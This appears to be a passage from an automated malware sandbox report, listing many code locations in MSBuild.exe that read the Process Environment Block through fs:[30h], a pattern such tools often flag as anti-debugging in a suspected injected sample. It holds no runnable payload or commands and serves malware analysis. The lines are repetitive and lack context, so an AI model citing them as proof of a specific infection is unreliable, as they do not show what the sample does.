Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193035C mov eax, dword ptr fs:[00000030h]	9_2_0193035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193035C mov eax, dword ptr fs:[00000030h]	9_2_0193035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193035C mov eax, dword ptr fs:[00000030h]	9_2_0193035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193035C mov ecx, dword ptr fs:[00000030h]	9_2_0193035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193035C mov eax, dword ptr fs:[00000030h]	9_2_0193035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193035C mov eax, dword ptr fs:[00000030h]	9_2_0193035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01932349 mov eax, dword ptr fs:[00000030h]	9_2_01932349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0191634C mov eax, dword ptr fs:[00000030h]	9_2_0191634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE284 mov eax, dword ptr fs:[00000030h]	9_2_018EE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE284 mov eax, dword ptr fs:[00000030h]	9_2_018EE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01930283 mov eax, dword ptr fs:[00000030h]	9_2_01930283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01930283 mov eax, dword ptr fs:[00000030h]	9_2_01930283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01930283 mov eax, dword ptr fs:[00000030h]	9_2_01930283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C02A0 mov eax, dword ptr fs:[00000030h]	9_2_018C02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C02A0 mov eax, dword ptr fs:[00000030h]	9_2_018C02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA2C3 mov eax, dword ptr fs:[00000030h]	9_2_018BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA2C3 mov eax, dword ptr fs:[00000030h]	9_2_018BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA2C3 mov eax, dword ptr fs:[00000030h]	9_2_018BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA2C3 mov eax, dword ptr fs:[00000030h]	9_2_018BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA2C3 mov eax, dword ptr fs:[00000030h]	9_2_018BA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C02E1 mov eax, dword ptr fs:[00000030h]	9_2_018C02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C02E1 mov eax, dword ptr fs:[00000030h]	9_2_018C02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C02E1 mov eax, dword ptr fs:[00000030h]	9_2_018C02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0218 mov eax, dword ptr fs:[00000030h]	9_2_018C0218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A823B mov eax, dword ptr fs:[00000030h]	9_2_018A823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01938243 mov eax, dword ptr fs:[00000030h]	9_2_01938243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01938243 mov ecx, dword ptr fs:[00000030h]	9_2_01938243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6259 mov eax, dword ptr fs:[00000030h]	9_2_018B6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA250 mov eax, dword ptr fs:[00000030h]	9_2_018AA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A826B mov eax, dword ptr fs:[00000030h]	9_2_018A826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4260 mov eax, dword ptr fs:[00000030h]	9_2_018B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4260 mov eax, dword ptr fs:[00000030h]	9_2_018B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4260 mov eax, dword ptr fs:[00000030h]	9_2_018B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E4588 mov eax, dword ptr fs:[00000030h]	9_2_018E4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2582 mov eax, dword ptr fs:[00000030h]	9_2_018B2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2582 mov ecx, dword ptr fs:[00000030h]	9_2_018B2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA580 mov ecx, dword ptr fs:[00000030h]	9_2_018AA580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA580 mov eax, dword ptr fs:[00000030h]	9_2_018AA580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE59C mov eax, dword ptr fs:[00000030h]	9_2_018EE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D45B1 mov eax, dword ptr fs:[00000030h]	9_2_018D45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D45B1 mov eax, dword ptr fs:[00000030h]	9_2_018D45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE5CF mov eax, dword ptr fs:[00000030h]	9_2_018EE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE5CF mov eax, dword ptr fs:[00000030h]	9_2_018EE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B65D0 mov eax, dword ptr fs:[00000030h]	9_2_018B65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA5D0 mov eax, dword ptr fs:[00000030h]	9_2_018EA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA5D0 mov eax, dword ptr fs:[00000030h]	9_2_018EA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC5ED mov eax, dword ptr fs:[00000030h]	9_2_018EC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC5ED mov eax, dword ptr fs:[00000030h]	9_2_018EC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE5E7 mov eax, dword ptr fs:[00000030h]	9_2_018DE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B25E0 mov eax, dword ptr fs:[00000030h]	9_2_018B25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE53E mov eax, dword ptr fs:[00000030h]	9_2_018DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE53E mov eax, dword ptr fs:[00000030h]	9_2_018DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE53E mov eax, dword ptr fs:[00000030h]	9_2_018DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE53E mov eax, dword ptr fs:[00000030h]	9_2_018DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DE53E mov eax, dword ptr fs:[00000030h]	9_2_018DE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535 mov eax, dword ptr fs:[00000030h]	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535 mov eax, dword ptr fs:[00000030h]	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535 mov eax, dword ptr fs:[00000030h]	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535 mov eax, dword ptr fs:[00000030h]	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535 mov eax, dword ptr fs:[00000030h]	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0535 mov eax, dword ptr fs:[00000030h]	9_2_018C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E656A mov eax, dword ptr fs:[00000030h]	9_2_018E656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E656A mov eax, dword ptr fs:[00000030h]	9_2_018E656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E656A mov eax, dword ptr fs:[00000030h]	9_2_018E656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6484 mov eax, dword ptr fs:[00000030h]	9_2_018B6484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B64AB mov eax, dword ptr fs:[00000030h]	9_2_018B64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193A4B0 mov eax, dword ptr fs:[00000030h]	9_2_0193A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A64BA mov eax, dword ptr fs:[00000030h]	9_2_018A64BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E44B0 mov ecx, dword ptr fs:[00000030h]	9_2_018E44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B04E5 mov ecx, dword ptr fs:[00000030h]	9_2_018B04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8402 mov eax, dword ptr fs:[00000030h]	9_2_018E8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8402 mov eax, dword ptr fs:[00000030h]	9_2_018E8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E8402 mov eax, dword ptr fs:[00000030h]	9_2_018E8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AE420 mov eax, dword ptr fs:[00000030h]	9_2_018AE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AE420 mov eax, dword ptr fs:[00000030h]	9_2_018AE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AE420 mov eax, dword ptr fs:[00000030h]	9_2_018AE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AC427 mov eax, dword ptr fs:[00000030h]	9_2_018AC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01936420 mov eax, dword ptr fs:[00000030h]	9_2_01936420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA430 mov eax, dword ptr fs:[00000030h]	9_2_018EA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EE443 mov eax, dword ptr fs:[00000030h]	9_2_018EE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D245A mov eax, dword ptr fs:[00000030h]	9_2_018D245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193C460 mov ecx, dword ptr fs:[00000030h]	9_2_0193C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BA471 mov eax, dword ptr fs:[00000030h]	9_2_018BA471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DA470 mov eax, dword ptr fs:[00000030h]	9_2_018DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DA470 mov eax, dword ptr fs:[00000030h]	9_2_018DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DA470 mov eax, dword ptr fs:[00000030h]	9_2_018DA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B07AF mov eax, dword ptr fs:[00000030h]	9_2_018B07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019307C3 mov eax, dword ptr fs:[00000030h]	9_2_019307C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D27ED mov eax, dword ptr fs:[00000030h]	9_2_018D27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D27ED mov eax, dword ptr fs:[00000030h]	9_2_018D27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D27ED mov eax, dword ptr fs:[00000030h]	9_2_018D27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B47FB mov eax, dword ptr fs:[00000030h]	9_2_018B47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B47FB mov eax, dword ptr fs:[00000030h]	9_2_018B47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193E7E1 mov eax, dword ptr fs:[00000030h]	9_2_0193E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC7F0 mov eax, dword ptr fs:[00000030h]	9_2_018EC7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC700 mov eax, dword ptr fs:[00000030h]	9_2_018EC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0710 mov eax, dword ptr fs:[00000030h]	9_2_018B0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E0710 mov eax, dword ptr fs:[00000030h]	9_2_018E0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192C730 mov eax, dword ptr fs:[00000030h]	9_2_0192C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC720 mov eax, dword ptr fs:[00000030h]	9_2_018EC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC720 mov eax, dword ptr fs:[00000030h]	9_2_018EC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E273C mov eax, dword ptr fs:[00000030h]	9_2_018E273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E273C mov ecx, dword ptr fs:[00000030h]	9_2_018E273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E273C mov eax, dword ptr fs:[00000030h]	9_2_018E273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E674D mov esi, dword ptr fs:[00000030h]	9_2_018E674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E674D mov eax, dword ptr fs:[00000030h]	9_2_018E674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E674D mov eax, dword ptr fs:[00000030h]	9_2_018E674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934755 mov eax, dword ptr fs:[00000030h]	9_2_01934755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AA740 mov eax, dword ptr fs:[00000030h]	9_2_018AA740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0193E75D mov eax, dword ptr fs:[00000030h]	9_2_0193E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B0750 mov eax, dword ptr fs:[00000030h]	9_2_018B0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F2750 mov eax, dword ptr fs:[00000030h]	9_2_018F2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F2750 mov eax, dword ptr fs:[00000030h]	9_2_018F2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B8770 mov eax, dword ptr fs:[00000030h]	9_2_018B8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0770 mov eax, dword ptr fs:[00000030h]	9_2_018C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC68B mov eax, dword ptr fs:[00000030h]	9_2_018EC68B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4690 mov eax, dword ptr fs:[00000030h]	9_2_018B4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B4690 mov eax, dword ptr fs:[00000030h]	9_2_018B4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EC6A6 mov eax, dword ptr fs:[00000030h]	9_2_018EC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E66B0 mov eax, dword ptr fs:[00000030h]	9_2_018E66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA6C7 mov ebx, dword ptr fs:[00000030h]	9_2_018EA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018EA6C7 mov eax, dword ptr fs:[00000030h]	9_2_018EA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0192E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0192E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0192E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0192E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019306F1 mov eax, dword ptr fs:[00000030h]	9_2_019306F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_019306F1 mov eax, dword ptr fs:[00000030h]	9_2_019306F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C26EB mov eax, dword ptr fs:[00000030h]	9_2_018C26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C26EB mov eax, dword ptr fs:[00000030h]	9_2_018C26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C26EB mov eax, dword ptr fs:[00000030h]	9_2_018C26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C26EB mov eax, dword ptr fs:[00000030h]	9_2_018C26EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F2619 mov eax, dword ptr fs:[00000030h]	9_2_018F2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192E609 mov eax, dword ptr fs:[00000030h]	9_2_0192E609
